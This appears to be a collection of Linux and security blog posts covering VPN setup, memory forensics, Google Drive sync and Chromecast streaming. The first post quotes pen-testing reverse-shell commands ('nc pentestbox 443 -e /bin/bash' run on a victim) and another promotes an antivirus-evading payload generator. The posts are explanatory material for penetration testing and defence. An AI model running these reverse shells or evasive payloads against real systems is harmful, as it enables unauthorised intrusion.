Reverse shell with Netcat: some use cases

What do you do if you have a Netcat that doesn’t support the -e or -c options to run a shell or your target doesn’t support /dev/tcp?


On SANS Penetration Testing Blog i’ve read a really useful article about Netcat, espacially about using this tool to create a reverse backdoor shell during a penetration test.

The post, written by Ed Skoudis, start with a description of Netcat and a simple example of backdoor shell:

Netcat is fantastic little tool included on most Linuxes and available for Windows as well. You can use Netcat (or its cousin, Ncat from the Nmap project) to create a reverse shell as follows:

First, on your own pen test machine, you create a Netcat listener waiting for the inbound shell from the target machine:

[email protected]# nc -nvlp 443

Here, I’m telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), to listen (-l) on a given local port (-p).

[…]

Then, on the target machine, get the following command to execute (perhaps via command injection in a web app or some other attack technique):

victim$ nc pentestbox 443 -e /bin/bash

This command invokes a Netcat client on the victim, which connects to the attacker’s pentestbox on TCP port 443. The Netcat client then executes /bin/bash (-e /bin/bash) on the victim, connecting that shell’s Standard Input and Standard Output to the network.

[…]

Then, on the pentestbox machine, we’ll see the inbound connection, which we can type commands into as follows (typed commands in bold):

[email protected]# nc -nvlp 443
listening on [any] 443 ...
connect to [AttackerIPaddress] from (UNKNOWN) [VictimIPaddress]
whoami
apache
hostname
victim

Simple, right? But, what if you have a version of Netcat that doesn’t support the -e option?

You could use /dev/tcp to implement a Netcat-like backdoor without using Netcat, but to use that technique, you need to have a bash that supports /dev/tcp. 
However some Debian variants typically has a bash compiled without /dev/tcp support.

And at this point Ed Skoudis show us some techniques to create a reverse shell also in this restricted environments, i suggest to continue the reading on this link:

https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/

How to use a cisco PCF file to connect to a corporate VPN with Linux

In four simple steps!


Do you have a configuration file for a cisco VPN client (PCF) and do you need to use it on your linuxbox?

“It could work!”

You can convert the PCF and connect to the corporate VPN with 4 simple steps:

  1. Open a terminal with root permissions.
  2. Install the vpnc client:
apt-get install vpnc

3. Convert PCF file into a vpnc configuration file:

pcf2vpnc profile.pcf profile.conf

4. Start VPN connection using the generated configuration file:

vpnc ./profile.conf

the VPN connection can be disconnected with this command:

vpnc-disconnect

That’s all!

Linux kernel explained, with a comic

“What is it, and how does it work?”

A funny explanation of linux kernel, made with a comic by Consolia.

https://consolia-comic.com/comics/kernel

I think more developers should know how the linux kernel works. Regarding it as a black box only gets you so far.

On a different note, some interesting things about the kernel i couldn’t share in the comic:

  • The kernel implements networking protocols such as IP, TCP and UDP, but application protocols such as FTP, DNS and HTTP are are not part of the kernel — implemented in the user space instead.
  • /proc is an illusion, it’s just a way for the kernel to talk to you — and for you to talk to the kernel.
  • All but two of the world’s 500 most powerful supercomputers run on Linux (the other two run on IBM AIX).
  • At time of writing the linux kernel has 18 million lines of code.

About Consolia

Techy, sciencey, nerdy, slightly weird, all rolled into a comic.

Automated memory capture and analysis on Linux with Linux Memory Grabber

A script for dumping Linux memory and creating Volatility profiles


I have already written something about dump of volatile memory on Linux systems.
Recently i have discovered this useful script developed by Hal Pomeranz, that automate all steps required to perform a memory analysis.


A lot of steps!

In order to perform a memory analysis on a Linux system, first need to be able to capture volatile memory, but you need to have a specific module compiled for the kernel of the system where you want to grab RAM.

After, in order to analyze the dump with Volatility, you need to create a profile that matches the system where the memory was captured: to make this, you need to compile a C program on the system and using dwarfdump to get the addresses of important kernel data structures.

This is not easy: there are a number of steps and some low-level Linux commands involved.

The “Linux Memory Grabber” script can automate all this steps.

ON FORENSIC PURITY
==================

If you're a stickler for forensic purity, this is probably not the
tool for you. Let's discuss some of the ways in which my tool interacts
with the target system:

Removable Media -- The tool is designed to be run from a portable USB
device such as a thumb drive. You are going to be plugging a writable
device into your target system, where it could potentially be targeted
by malicious users or malware on the system. The act of plugging the
device into the system is going to change the state of the machine
(e.g., create log entries, mtab entries, etc). If the device is not
auto-mounted by the operating system, the user must manually mount the
device via a root shell.

Compilation -- lmg builds a LiME kernel module for the system.
Creating a Volatility(TM) profile also involves compiling code on
the target machine. So gcc will be executed, header files read,
libraries linked, etc. lmg tries to minimize impact on the file
system of the target machine by setting TMPDIR to a directory on
the USB device lmg runs from. This means that intermediate files
created by the compiler will be written to the thumb drive rather
than the local file system of the target machine.

Dependencies -- In order to compile kernel code on Linux, the target
machine needs a working development environment with gcc, make, etc
and all of the appropriate include files and shared libraries.
And in particular, the kernel header files need to be present on
the local machine. These dependencies may not exist on the target.
In this case, the user is faced with the choice of installing
the appropriate dependencies (if possible) or being unable to
acquire memory from the target.

Malware -- lmg uses /bin/bash, gcc, zip, and a host of other programs from
the target machine. If the system has been compromised, the applications
lmg uses may not be trustworthy. A more complete solution would be
to create a secure execution environment for lmg on the portable USB
device, but was beyond the scope of this initial proof of concept.

Memory -- All of the commands being run will cause the memory of the
target system to change. The act of capturing RAM will always create
artifacts, but in this case there is extensive compilation, file system
access, etc in addition to running a RAM dumper.

All of that being said, lmg is a very convenient tool for allowing
less-skilled agents to capture useful memory analysis data from
target systems.

Note that lmg will look for an already existing LiME module on the
USB device that matches the kernel version and processor architecture
of the target machine. If found, lmg will not bother to recompile.
Similarly, you may choose to not have lmg create the Volatility(TM)
profile for the target in order to minimize the impact on the target system.

lmg uses relative path names when invoking programs like gcc and zip.
So if you wish to run these programs from alternate media, simply update
$PATH as appropriate before running lmg.

The usage is pretty simple:

When you wish to acquire RAM, plug the thumb drive into your target
system. On most Linux systems, new USB devices will get automatically
mounted under /media. Let’s assume yours ends up under /media/LMG.

Now, as root, run “/media/LMG/lmg”. This is interactive mode and
the user will be prompted for confirmation before lmg builds a LiME
module for the system and/or creates a Volatility(TM) profile.
If you don’t want to be prompted, use “/media/LMG/lmg -y”.

Everything else is automated. After the script runs, you will have
a new directory on the thumb drive named 

 “…/capture/<hostname>-YYYY-MM-DD_hh.mm.ss”

lmg supports a -c option for specifying a case ID directory name to be
used instead of the default “<hostname>-YYYY-MM-DD_hh.mm.ss” directory.

Whatever directory name is used, the directory will contain:

 <hostname>-YYYY-MM-DD_hh.mm.ss-memory.lime — the RAM capture
 <hostname>-YYYY-MM-DD_hh.mm.ss-profile.zip — Volatility(TM) profile
 <hostname>-YYYY-MM-DD_hh.mm.ss-bash — copy of target’s /bin/bash
 volatilityrc — prototype Volatility config file

The volatilityrc file defines the appropriate locations for the captured
memory and plugin.

For more technical information, and installation instructions plese refer to github repository:

https://github.com/halpomeranz/lmg

Want to test your antivirus with a custom malware payload?

You can, with HERCULES!


HERCULES is a tool, developed in Go by Ege Balcı, that can generate payloads that elude antivirus software.

The tool is useful to generate PoC in order to check the accuracy of various antivirus solutions: the payload is obfuscated and hidden using UPX.

WHAT IS UPX ?

UPX (Ultimate Packer for Executables) is a free and open source executable packer supporting a number of file formats from different operating systems. UPX simply takes the binary file and compresses it, packed binary unpack(decompress) itself at runtime to memory.


Installation

HERCULES supports those linux versions:

  • Ubuntu: 16.04 / 15.10
  • Kali linux: Rolling / Sana
  • Manjaro: all versions
  • Arch Linux: all versions
  • Black Arch: all versions
  • Parrot OS: 3.1
go get github.com/fatih/color
go run Setup.go

More info and downloads

https://github.com/EgeBalci/HERCULES/

Reinstall a running Linux system via SSH without rebooting, with takeover.ssh

It can sound like science fiction, but it is possible! (Running in RAM!)


And you can do with this script developed by Héctor Martín Cantero:

A script to completely take over a running Linux system remotely, allowing you to log into an in-memory rescue environment, unmount the original root filesystem, and do anything you want, all without rebooting. Replace one distro with another without touching a physical console.

…this script will not (itself) make any permanent changes to your existing root filesystem (assuming you run it from a tmpfs), so as long as you can remotely reboot your box using an out-of-band mechanism, you should be OK.

How it works?

Seven simple steps:

  1. Create a directory /takeover on your target system and mount a tmpfs on it
  2. Extract your rescue environment there. Make sure it works by chrooting into it and running a few commands. Make sure you do not bork filesystem permissions. Exit the chroot.
  3. Grab a recent copy of busybox (statically linked) and put it in /takeover/busybox. You can find binaries here. Make sure it works by trying something like /takeover/busybox sh.
  4. Copy the contents of this repository into /takeover.
  5. Compile fakeinit.c. It must be compiled such that it works inside the takeover environment. If your rescue environment has gcc, you can just compile it inside the chroot: chroot /takeover gcc /fakeinit.c -o /fakeinit. Otherwise, you might want to statically link it.
  6. Shut down as many services as you can on your host. takeover.sh will by default set up an SSHd listening on port 80, though you may edit this in the script.
  7. Run sh /takeover/takeover.sh and follow the prompts.

If everything worked, congratulations! You may now use your new SSH session to kill any remaining old daemons (kill -9 is recommended to make sure they don’t try to do anything silly during shutdown), and then unmount all filesystems under /old_root, including /old_root itself. You may want to first copy /old_root/lib/modules into your new tmpfs in case you need any old kernel modules.

takeover.sh could be extended to support re-execing a new init once you’re done. This could be used to switch to a newdistro entirely without rebooting, as long as you’re happy using the old kernel. If you’re interested, pull requests welcome :-).

More info and download

https://github.com/marcan/takeover.sh

How to sync your GoogleDrive storage on Linux with Rclone

And some tips to integrate it on XFCE4

Google Drive is definitely a great cloud storage service.
However, it suffers from significant limitations, including the lack of an official sync client for Linux.

Fortunately there are many tools that allow you to access Google Drive with Linux, but no one provides a user experience similar to the Windows/OSX client.

So, for my Debian laptop, i have realized some scripts to synchronize my GoogleDrive documents using RClone.

Rclone is a command line program to sync files and directories to and from a lot of cloud storages:

  • Google Drive
  • Amazon S3
  • Openstack Swift / Rackspace cloud files / Memset Memstore
  • Dropbox
  • Google Cloud Storage
  • Amazon Drive
  • Microsoft One Drive
  • Hubic
  • Backblaze B2
  • Yandex Disk
  • The local filesystem

Rclone is extremely powerful, however the ‘sync’ option is not bidirectional, so some workarounds are needed to get an acceptable user experience.

For information about rclone installation you can refer to the official guide:

http://rclone.org/install/

and here a simple guide to configure GoogleDrive:

http://rclone.org/drive/

Once installed Rclone and proper configured the Google Drive account let’s start to make a couple of scripts to realize an experience similar to git , with the ability to perform ‘push’ and ‘pull’ operations from cloud storage.

https://gist.github.com/andreafortuna/925a781c1e5ab1e70c4b9ffcb7ed2158

https://gist.github.com/andreafortuna/814be0b16c734fbd3954f40c3e71d4b1

The scripts can be saved in a hidden directory in your home (such as ~/.scripts/): if you run one of this script into a specific directory inside the folder ‘Documents’, it performs a synchronization to the cloud storage (push) or from the remote storage to the local disk (pull).


Integrate the scripts with XFCE4 Thunar

On my laptop, i use XFCE4 as desktop manager. The default file manager (thunar) has a useful feature: the Custom Actions

Thunar allows users to add custom actions to the file and folder context menus (by the use of the thunar-ucaplugin, part of the Thunar distribution, in the plugins/ subdirectory). You can set up new actions in the Custom Actions dialog, available via the Configure custom actions… item in the Edit menu.

So, i have realized two custom action in order to perform push and pull operation directly from the graphical interface.

Sorry for Italian UI! :-)

Simply create one custom action named ‘GoogleDrive Pull’ with this command line:

xterm -hold -e ~/.scripts/googledrive_pull.sh

and another named ‘GoogleDrive Push’ with this command:

xterm -hold -e ~/.scripts/googledrive_push.sh

In this way, by performing the click with the right button in a directory within the ‘Documents’ folder, you can download the updated version of the same from Google Drive or upload to the cloud the local changes:

How to dump volatile memory of a Linux machine?

Priceless data in case of attack!


Properly make a copy of RAM of a Linux machine can be basic for forensic analysis against a cyberattack: as for the data to disk, even those in the memory may contain valuable information, and can be saved using tools already in the operating system.

Linux provides two virtual devices for this purpose, /dev/mem (linked to the physical system memory) and /dev/kmem (maps to the entire virtual memory space, including the swap) but in many distributions are disabled for security reasons.

On recent Linux systems, /dev/mem provides access only to a restricted range of addresses, rather than the full physical memory of a system. On other systems it may not be available at all. Throughout the 2.6 series of the Linux kernel, the trend was to reduce direct access to memory via pseudo-device files.

On Red Hat systems (and derived distros such as CentOS), the /dev/crash pseudo-device can be loaded with the command

modprobe crash

and used to access the memory.

On other distributions with 2.6 kernels can be used the fmem module that creates device /dev/fmem, similar to /dev/mem but without limitations.

When enabled the pseudo-device, the memory dump can be performed with the command (es.):

sudo dd if=/dev/fmem of=/tmp/memory.raw bs=1MB

Next, the dump can be analyzed using Volatility.

You’re using Linux Disk Encryption? Can be bypassed by pressing ‘ENTER’ for 70 seconds!

A really dumb bug, but with a really simple fix!


A vulnerability in Cryptsetup, a utility used to set up encrypted filesystems on Linux distributions, could allow an attacker to retrieve a root rescue shell on some systems.

The security issue was discovered by the security researcher Hector Marco and relies to a vulnerability (CVE-2016–4484) in the implementation of the Cryptsetup utility used for encrypting hard drives via Linux Unified Key Setup (LUKS, the standard implementation of disk encryption on a Linux-based operating system).

The Cryptsetup utility has a strange way to handle password failures for the decryption process when a system boots up, permitting a user retry the password multiple times.



When a user reach 93 password attempts, it is dropped to a shell that has root privileges.

In other words, if you enter a blank password 93 times — or simply hold down the ‘Enter’ key for roughly 70 seconds — you will gain access to a root initramfs shell.


I can fix it?

If your distribution is vulnerable and a patch is not yet available, the vulnerability can be fixed by modifying grub configuration, adding the “panic” parameter to the kernel in order to prevent a shell:

# sed -i 's/GRUB_CMDLINE_LINUX_DEFAULT="/GRUB_CMDLINE_LINUX_DEFAULT="panic=5 /' /etc/default/grub
# grub-install

More technical information on Hector Marco’s website

Streaming media contents from Linux to Chromecast?

It’s simple, with Stream2Chromecast!


Are you searching for an easy way to stream media files from your LinuxBox to a Chromecast?

You can use Stream2chromecast, a simple Python script that makes the task of streaming media files to a Chromecast device ridiculously easy.

Simply clone the project’s GitHub repository with this command

git clone https://github.com/Pat-Carter/stream2chromecast.gi

Now, to stream a media content, start the script with this command line

stream2chromecast.py /path/to/foo.mp4

The utility also supports basic playback controls through -pause, -continue and -stop options.

Subtitles?

Only the WebVTT format is currently supported.

If you have an SRT subtitle file, you can convert it with this online tool:

http://www.webvtt.org/

To cast the subtitles on /path/to/subtitles.vtt use this command:

stream2chromecast.py -subtitles /path/to/subtitles.vtt /path/to/foo.mp4

More info and download

http://www.webvtt.org/